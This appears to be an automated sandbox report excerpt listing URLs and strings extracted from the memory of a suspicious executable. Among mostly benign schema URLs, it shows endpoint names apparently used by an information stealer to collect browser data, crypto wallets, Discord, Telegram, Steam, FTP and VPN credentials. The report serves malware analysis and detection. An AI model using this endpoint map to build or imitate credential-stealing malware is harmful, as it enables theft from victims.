                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0N
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0O
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmpString found in binary or memory: http://s3-r-w.us-east-2.amazonaws.com
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438392427.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagews.com/crypted.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity$
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Confirm
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponsel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseD
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponsel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Init
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplay
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplayResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsers
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsersResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWallets
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWalletsResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefenders
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartDefendersResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartDiscord
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartDiscordResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnections
Source: eYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnectionsResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartHardwares
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartHardwaresResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsers
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsersResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwares
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartLanguages
Source: eYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartNordVPN
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartNordVPNResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPN
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPNResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartProcesses
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartProcessesResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPN
Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPNResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartScannedFiles
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartScannedFilesResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartSteamFiles
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartSteamFilesResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFiles
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponsel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponseD
Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponsel
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
